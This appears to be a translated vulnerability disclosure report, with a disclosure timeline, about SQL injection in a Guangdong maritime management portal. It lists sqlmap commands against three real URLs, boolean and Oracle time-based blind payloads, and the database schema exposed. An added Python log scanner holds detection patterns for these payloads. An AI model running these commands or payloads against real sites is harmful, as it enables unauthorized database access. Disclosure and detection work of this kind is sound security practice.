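2015-07-03: Details reported to the vendor; awaiting vendor handling
2015-07-07: Vendor confirmed; details disclosed to the vendor only
2015-07-17: Details disclosed to core white hats and experts in related fields
2015-07-27: Details disclosed to regular white hats
2015-08-06: Details disclosed to trainee white hats
2015-08-21: Details disclosed to the public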
Injection point: sqlmap.py -u "http://www.gdhydro.com/MaritimeManage/portal/news/pic_news.jsp?columnId=3"
Parameter: columnId
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: columnId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: columnId=3 AND 4794=4794

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: columnId=3 AND 2340=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(74)||CHR(116)||CHR(65),5)
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'MARITIME'
Injection point 2: sqlmap.py -u "http://www.gdhydro.com/MaritimeManage/portal/navigationBookInfo/checkimg.jsp?imgid=354"
Parameter: imgid
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: imgid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: imgid=354' AND 8125=8125 AND 'HwGq'='HwGq

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: imgid=354' AND 1224=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(97)||CHR(65)||CHR(101),5) AND 'SrYE'='SrYE
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'MARITIME'
Injection point 3: sqlmap.py -u "http://www.gdhydro.com/MaritimeManage/portal/news/news_list.jsp?sectionName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2&columnId=49"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: columnId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sectionName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2&columnId=49 AND 2390=2390

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sectionName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2&columnId=49 AND 7717=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(122)||CHR(72)||CHR(107),5)
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'MARITIME'
Parameter filtering
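
The strict rule such a filter would enforce can also be run over web access logs to find requests that probed these parameters. The following is an added example, not part of the original report: it assumes `columnId` and `imgid` are integer identifiers (based on the values shown above) and a combined-format access log; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: columnId and imgid are integer IDs (the report shows 3, 354, 49).
NUMERIC_PARAMS = {"columnId", "imgid"}
# Constructs that appear in the sqlmap payloads quoted in the report.
SIGNATURES = {
    "oracle-time-delay": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I),
    "boolean-tautology": re.compile(r"\bAND\s+'?(\w+)'?\s*=\s*'?\1\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jul/2015:10:00:01 +0800] "GET /MaritimeManage/portal/news/pic_news.jsp?columnId=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jul/2015:10:02:11 +0800] "GET /MaritimeManage/portal/news/pic_news.jsp?columnId=3%20AND%204794%3D4794 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jul/2015:10:02:40 +0800] "GET /MaritimeManage/portal/navigationBookInfo/checkimg.jsp?imgid=354%27%20AND%201224%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(73)%7C%7CCHR(97)%7C%7CCHR(65)%7C%7CCHR(101)%2C5)%20AND%20%27SrYE%27%3D%27SrYE HTTP/1.1" 200 310',
]

def inspect_line(line):
    """Return sorted 'param:reason' findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = set()
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS:
            continue
        if not re.fullmatch(r"[0-9]+", value):
            findings.add(f"{name}:non-numeric")  # what a strict filter rejects
        for label, rx in SIGNATURES.items():
            if rx.search(value):
                findings.add(f"{name}:{label}")
    return sorted(findings)

def scan(lines):
    """Map 1-based line number -> findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := inspect_line(line))}

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(n, ", ".join(findings))
```

The `non-numeric` finding is the general check and catches payload shapes the two signatures do not; the signatures only add context for triage.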
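Severity: Medium
Vulnerability Rank: 9
Confirmation time: 2015-07-07 09:37
CNVD confirmed and reproduced the reported vulnerability and has passed it to CNCERT for dispatch to the Guangdong branch center, which will follow up and coordinate with the organization that manages the website to handle it.
None yet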